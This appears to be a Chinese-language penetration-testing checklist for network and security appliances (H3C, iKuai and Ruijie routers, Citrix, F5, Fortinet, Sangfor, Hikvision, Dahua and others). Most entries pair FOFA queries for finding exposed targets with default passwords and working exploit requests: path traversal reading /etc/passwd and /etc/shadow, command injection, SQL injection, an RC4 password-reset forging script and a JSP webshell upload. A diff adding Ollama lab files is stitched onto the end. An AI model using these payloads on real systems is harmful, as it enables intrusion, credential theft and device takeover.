 ##### webproc 任意文件读取 CVE-2021-27250 ✅
 poc：
 ```
 POST /cgi-bin/webproc
 getpage=html%2Findex.html&errorpage=/etc/passwd&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=123&%3Aaction=login&%3Asessionid=3c1f7123
 ```
 #### H3C 企业路由器（ER、ERG2、GR系列）
 ##### 任意用户登录漏洞 ✅
 攻击者可通过访问 /userLogin.asp/../actionpolicy_status/../xxxx.cfg 接口，xxxx 为设备型号（比如设备型号为 ER5200G2，即访问 /userLogin.asp/../actionpolicy_status/../ER5200G2.cfg），绕过 COOKIE 验证，进行目录穿越，获取设备的明文配置文件。
 配置中有明文的 Web 管理员账号 admin 密码，登录后台可通过开启 telnet 获取命令执行权限。
 #### iKuai 路由器
 FOFA：
 ```
 title="登录爱快流控路由"
 ```
 ##### 后台任意文件读取✅
 默认密码：admin/admin
 poc：
 ```
 GET /Action/download?filename=../../../../../../etc/shadow HTTP/1.1
 Host：
 ....
 ```
 ##### 流控路由 SQL注入漏洞✅
 万能密码登录：
 ```
 user: "or""=""or""="
 pass: 空
 ```
 #### 锐捷 NBR路由器
 ##### 远程命令执行漏洞 CNVD-2021-09650 ✅
 FOFA：
 ```
 title="锐捷网络-EWEB网管系统"
 icon_hash="-692947551"
 ```
 构造命令执行：
 ```
 POST /guest_auth/guestIsUp.php
 mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt
 ```
 再访问：
 ```
 /guest_auth/test.txt
 ```
 ### 0x06 负载均衡
 #### Citrix ADC
 ##### 默认口令
 ```
 nsroot/nsroot
 ```
 ##### 远程代码执行 CVE-2019-19781
 访问以下链接，返回403则表示不存在漏洞，返回smb.conf则证明漏洞存在。
 ```
 curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is
 或
 curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is --insecure
 ```
 exp：
 - https://github.com/trustedsec/cve-2019-19781
 - https://github.com/jas502n/CVE-2019-19781
 #### F5 BIG-IP
 ##### 远程代码执行 CVE-2020-5902
 exp：
 - https://github.com/jas502n/CVE-2020-5902
 - https://github.com/theLSA/f5-bigip-rce-cve-2020-5902
 ##### 远程代码执行 CVE-2021-22986
 ```
 POST /mgmt/tm/util/bash HTTP/1.1
 Host: your_ip
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 Accept-Encoding: gzip, deflate
 Authorization: Basic YWRtaW46QVNhc1M=
 X-F5-Auth-Token: 
 Connection: close
 Upgrade-Insecure-Requests: 1
 Content-Length: 41
 {"command":"run","utilCmdArgs":"-c id"}
 ```
 exp：
 - https://github.com/h4x0r-dz/RCE-Exploit-in-BIG-IP
 - https://github.com/Al1ex/CVE-2021-22986
 #### 天融信 Top-app LB
 ##### SQL注入
 ```
 POST /acc/clsf/report/datasource.php HTTP/1.1
 Content-Type: application/x-www-form-urlencoded
 t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22-- &o=r_Speed&gid=0&lmt=10&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=
 ```
 #### 无密码登录
 ```
 任意用户名  密码：;id
 ```
 ### 0x07 VPN
 #### Fortigate SSL VPN
 FOFA：
 ```
 fofa: icon_hash="-404383634" app="FORTINET-防火墙"
 ```
 ##### 密码读取 CVE-2018-13379
 exp：https://github.com/milo2012/CVE-2018-13379
 ##### 任意密码重置 CVE-2018-13382
 exp：https://github.com/milo2012/CVE-2018-13382
 ##### 认证绕过 CVE-2022-40684
 exp：https://github.com/horizon3ai/CVE-2022-40684
 ```
 git clone https://github.com/horizon3ai/CVE-2022-40684.git
 cd CVE-2022-40684
 ssh-keygen -t rsa
 python3 CVE-2022-40684.py -t 1.1.1.1 --username admin --key-file ~/.ssh/id_rsa.pub
 ssh admin@1.1.1.1
 ```
 #### Palo Alto SSL VPN
 ##### GlobalProtect 远程代码执行 CVE-2019-1579
 exp：https://github.com/securifera/CVE-2019-1579
 #### Pulse Secure SSL VPN
 ##### 任意文件读取 CVE-2019-11510
 exp：https://github.com/projectzeroindia/CVE-2019-11510
 ##### 远程代码执行 CVE-2019-11539
 exp：https://github.com/0xDezzy/CVE-2019-11539
 #### 深信服 VPN
 ##### 常见密码
 ```
 admin/sangfor@123
 sangfor/sangfor
 test/test
 test1/123456b
 ```
 ##### 口令爆破
 用户登录，若多次尝试登录失败会要求输入验证码，若输入错误的验证码，会提示“校验码错误或校验码已过期”；修改登录请求的数据包，清空cookie和验证码字段的值即可绕过验证码，此时提示“用户名或密码错误”。
 ```
 /por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd=
 ```
 ##### 短信绕过
 ```
 POST https://ip/por/changetelnum.csp?apiversion=1
 newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1
 ```
 ##### 任意密码重置
 加密算法使用了默认的key，攻击者构利用key构造重置密码数据包从而修改任意用户的密码。利用需要登陆账号。
 - M7.6.6R1版本key为20181118
 - M7.6.1key为20100720
 ```
 POST /por/changepwd.csp
 sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN(脚本计算后结果)
 ```
 ```python
 from Crypto.Cipher import ARC4
 from binascii import a2b_hex
 def myRC4(data, key):
    rc41= ARC4.new(key)
    encrypted =rc41.encrypt(data)
    return encrypted. encode('hex')
 def rc4_decrpt_hex(data, key):
    rc41= ARC4. new(key)
    return rc41. decrypt(a2b_hex(data))
 key= '20100720'
 data = r',username-TARGET_USERNAME, ip-127.0.0.1,grpid-1, pripsw-suiyi , newpsw=TARGET PASSWORD,'
 print myRC4(data, key)
 ```
 #### 锐捷 SSL VPN
 FOFA：
 ```
 icon_hash="884334722" || title="Ruijie SSL VPN"
 ```
 ##### 越权访问
 - UserName 参数为已知用户名
 ```
 GET /cgi-bin/main.cgi?oper=getrsc HTTP/1.1
 Cookie: UserName=admin; SessionId=1; FirstVist=1; Skin=1; tunnel=1
 ```
 #### Juniper SSL VPN 
 - [Juniper SSLVPN / JunOS RCE and Multiple Vulnerabilities](https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/)
 ## 三、终端响应与检测
 ### 0x01 EDR/杀软
 #### 深信服 EDR
 ##### 命令执行1
 exp：https://github.com/BH2UOL/sangfor-edr-exploit
 ##### 命令执行2
 ```
 POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
 {"params":"w=123\"'1234123'\"|命令"}
 ```
 ##### 后台任意用户登录
 ```
 xxx.xxx.xxx.xxx/ui/login.php?user=admin
 ```
 #### 360天擎
 FOFA：
 ```
 title="360天擎"
 ```
 ##### 前台SQL注入
 ```
 /api/dp/rptsvcsyncpoint?ccid=1
 ```
 ##### 数据库信息泄露
 ```
 http://x.x.x.x/api/dbstat/gettablessize
 ```
 #### 金山 V8 终端安全系统
 FOFA：
 ```
 title="在线安装-V8+终端安全系统Web控制台"
 ```
 ##### 任意文件读取
 ```
 /htmltopdf/downfile.php?filename=downfile.php
 ```
 ##### pdf_maker.php 命令执行
 ```
 POST /inter/pdf_maker.php HTTP/1.1
 Content-Type: application/x-www-form-urlencoded
 url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx
 ```
 #### 金山 VGM防毒墙 
 FOFA：
 ```
 "金山VGM"
 ```
 ##### downFile.php 任意文件读取
 poc：
 ```
 /downFile.php?filename=../../../../etc/passwd
 ```
 ### 0x02 数据防泄漏系统
 #### 天融信数据防泄漏系统
 ##### 越权修改管理员密码
 无需登录权限,由于修改密码处未校验原密码,且 /?module=auth_user&action=mod_edit_pwd 接口未授权访问,造成直接修改任意用户密码。 默认 superman 账户 uid 为 1。
 ```
 POST /?module=auth_user&action=mod_edit_pwd
 Cookie: username=superman;
 uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1
 ```
 ## 四、其他
 ### 0x01 网络摄像机
 #### Hikvision DS/IDS/IPC 等设备
 FOFA：
 ```
 "671-1e0-587ec4a1"
 ```
 ##### 远程命令执行 CVE-2021-36260 ✅
 ```
 python CVE-2021-36260.py --rhost 127.0.0.1 --rport 8081 --cmd "ls"
 ```
 ### 0x02 综合管理平台
 #### 大华 智慧园区综合管理平台 
 FOFA：
 ```
 app="dahua-智慧园区综合管理平台"
 ```
 ##### user_save.action 任意文件上传 ✅
 漏洞指纹：
 ```
 POST /admin/user_save.action
 ```
 ```
 POST /WPMS/getPublicKey
 ```
 #### 大华 城市安防监控系统平台管理 
 FOFA：
 ```
 "attachment_downloadByUrlAtt.action"
 ```
 ##### attachment_downloadByUrlAtt.action 任意文件下载 ✅
 poc：
 ```
 /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd
 ```
 #### Hikvision iVMS-8700综合安防管理平台
 FOFA：
 ```
 icon_hash="-911494769"
 ```
 ##### 任意文件下载 ✅
 验证POC，token 为 URL md5：
 ```
 /eps/api/triggerSnapshot/download?token=xxx&fileUrl=file:///C:/windows/win.ini&fileName=1 
 ```
 ##### 任意文件上传 ✅
 发送请求包上传文件：
 ```
 POST /eps/resourceOperations/upload.action HTTP/1.1
 Host: 
 ------WebKitFormBoundaryTJyhtTNqdMNLZLhj
 Content-Disposition: form-data; name="fileUploader";filename="test.jsp"
 Content-Type: image/jpeg
 <%out.print("hello");%>
 ------WebKitFormBoundaryTJyhtTNqdMNLZLhj--
 ```
 访问webshell：
 ```
 /eps/upload/769badc8ef5944da804a4ca3c8ecafb0.jsp
 ```
--- a/README.md
+++ b/README.md
@ -4,11 +4,6 @@
 ## 0x01 项目导航
 - CHECKLIST
  * Nacos 漏洞 Checklist
  * SmartBi 漏洞 Checklist
  * 安全设备漏洞 Checklist
 - CMS漏洞
  * 74cms v4.2.1 v4.2.129 后台getshell漏洞
@ -737,6 +732,9 @@
  * VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972
 - 人工智能漏洞
  * Huggingface Transformers Checkpoint 反序列化漏洞 CVE-2024-3568
  * Ollama 文件存在性泄露漏洞 CVE-2024-39719
  * Ollama 文件存在性泄露漏洞 CVE-2024-39722
  * Ollama 目录遍历致代码执行漏洞 CVE-2024-37032
 - 其他漏洞
--- a/base/ollama/0.1.33/docker-compose.yml
+++ b/base/ollama/0.1.33/docker-compose.yml
@ -0,0 +1,11 @@
 services:
  ollama:
    image: ollama/ollama:0.1.33
    container_name: ollama
    volumes:
      - ollama:/root/.ollama
    ports:
      - "11434:11434"
 volumes:
  ollama:
--- a/base/ollama/0.1.45/docker-compose.yml
+++ b/base/ollama/0.1.45/docker-compose.yml
@ -0,0 +1,11 @@
 services:
  ollama:
    image: ollama/ollama:0.1.45
    container_name: ollama
    volumes:
      - ollama:/root/.ollama
    ports:
      - "11434:11434"
 volumes:
  ollama:
--- a/base/ollama/0.3.14/docker-compose.yml
+++ b/base/ollama/0.3.14/docker-compose.yml
@ -0,0 +1,11 @@
 services:
  ollama:
    image: ollama/ollama:0.3.14
    container_name: ollama
    volumes:
      - ollama:/root/.ollama
    ports:
      - "11434:11434"
 volumes:
  ollama:
--- a/人工智能漏洞/Ollama
+++ b/人工智能漏洞/Ollama
@ -22,10 +22,26 @@ Ollama < 0.1.34
 ## 环境搭建
-Docker 启动 Ollama 0.1.33 服务：
+docker-compose.yml
 ```
-docker run -d -v ollama:/root/.ollama -p 11434:11434 --name ollama ollama/ollama:0.1.33
+services:
  ollama:
    image: ollama/ollama:0.1.33
    container_name: ollama
    volumes:
      - ollama:/root/.ollama
    ports:
      - "11434:11434"
 volumes:
  ollama:
 ```
 执行如下命令启动 Ollama 0.1.33 服务:
 ```
 docker compose up -d
 ```
 环境启动后，访问 `http://your-ip:11434/`，此时 Ollma 0.1.33 已经成功运行。
@ -85,4 +101,4 @@ https://github.com/Bi0x/CVE-2024-37032
 ## 漏洞修复
-官方已经发布 0.1.34 修复该漏洞，建议升级至 0.1.34 及其以上版本。
+- 升级至最新版本 https://github.com/ollama/ollama
--- a/CVE-2024-39722/image-20250305140113735.png
+++ b/CVE-2024-39722/image-20250305140113735.png